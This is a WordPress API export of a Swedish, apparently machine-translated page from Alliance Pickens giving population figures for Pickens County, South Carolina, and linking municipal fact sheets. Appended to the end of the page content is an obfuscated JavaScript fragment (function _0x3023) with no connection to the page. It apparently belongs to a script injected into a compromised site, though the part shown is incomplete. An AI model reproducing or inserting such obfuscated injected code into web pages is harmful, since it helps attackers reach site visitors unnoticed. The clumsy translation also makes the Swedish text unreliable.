{"id":6092,"date":"2020-10-28T14:30:02","date_gmt":"2020-10-28T14:30:02","guid":{"rendered":"http:\/\/alliancepickens.com\/arbetskraftsutveckling\/demografi\/"},"modified":"2020-12-04T20:13:51","modified_gmt":"2020-12-04T20:13:51","slug":"demografi","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/","title":{"rendered":"Demografi"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;10397&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-Drive-Time-Labled.pdf&#8221;][vc_column_text el_class=&#8221;drivetime&#8221;]K\u00f6rtid fr\u00e5n Pickens County Commerce Park[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5822&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10383&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>POPULATION<\/h2>\n<p>Med en <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=13276\">befolkningstillv\u00e4xt<\/a> p\u00e5 28 procent under de senaste 20 \u00e5ren, Pickens County.South Carolina.USA \u00e4r en av de snabbast v\u00e4xande l\u00e4nen i Upstate South Carolina. Enligt US Census Bureau, 2020 Pickens County befolkningen \u00e4r 126.595 och 2025 Pickens County befolkningen ber\u00e4knas vara 131.255 personer. Dessutom \u00e4r 65 procent av Upstate befolkning p\u00e5 1.309.615 \u00e4r och kommer att leva inom 30 miles fr\u00e5n Pickens County Commerce Park.<\/p>\n<p><a class=\"greenbtn offsite\" href=\"https:\/\/www.scacog.org\/Statistics--Population\">Visa mer statistik<\/a><\/p>\n<p>[\/vc_column_text][vc_empty_space][vc_column_text]<\/p>\n<h3><strong>Kommuner<\/strong><\/h3>\n<p>Pickens County omfattar sju kommuner:[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Centrala<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_TownofCentral.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Clemson<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_CityofClemson.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Easley<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_CityofEasley.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Liberty<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_CityofLiberty.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Norris<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_TownofNorris.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Pickens<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_CityofPickens.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_column_text el_class=&#8221;pop&#8221;]<strong>Sex mil<\/strong><\/p>\n<p><a href=\"https:\/\/www.scacog.org\/files\/files\/Economic%20Development\/2019_Fact%20Sheet_TownofSixMile.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><i class=\"fas fa-download\"><\/i>Ladda ner faktablad<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om utveckling av arbetskraften<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;10397&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-Drive-Time-Labled.pdf&#8221;][vc_column_text el_class=&#8221;drivetime&#8221;]K\u00f6rtid fr\u00e5n Pickens County Commerce Park[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5822&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10383&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] POPULATION Med en befolkningstillv\u00e4xt p\u00e5 28 procent under de senaste 20 \u00e5ren, Pickens County.South Carolina.USA \u00e4r en av de snabbast v\u00e4xande l\u00e4nen i Upstate&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6067,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6092","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Demografi - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Demografi - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;10397&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-Drive-Time-Labled.pdf&#8221;][vc_column_text el_class=&#8221;drivetime&#8221;]K\u00f6rtid fr\u00e5n Pickens County Commerce Park[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5822&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10383&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] POPULATION Med en befolkningstillv\u00e4xt p\u00e5 28 procent under de senaste 20 \u00e5ren, Pickens County.South Carolina.USA \u00e4r en av de snabbast v\u00e4xande l\u00e4nen i Upstate&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:51+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/demografi\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/demografi\\\/\",\"name\":\"Demografi - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:02+00:00\",\"dateModified\":\"2020-12-04T20:13:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/demografi\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/demografi\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/demografi\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Arbetskraftsutveckling\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Demografi\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Demografi - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/","og_locale":"sv_SE","og_type":"article","og_title":"Demografi - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;10397&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-Drive-Time-Labled.pdf&#8221;][vc_column_text el_class=&#8221;drivetime&#8221;]K\u00f6rtid fr\u00e5n Pickens County Commerce Park[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5822&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10383&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text] POPULATION Med en befolkningstillv\u00e4xt p\u00e5 28 procent under de senaste 20 \u00e5ren, Pickens County.South Carolina.USA \u00e4r en av de snabbast v\u00e4xande l\u00e4nen i Upstate&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:51+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/","url":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/","name":"Demografi - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:30:02+00:00","dateModified":"2020-12-04T20:13:51+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/demografi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Arbetskraftsutveckling","item":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/"},{"@type":"ListItem","position":3,"name":"Demografi"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6092"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6092\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6067"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}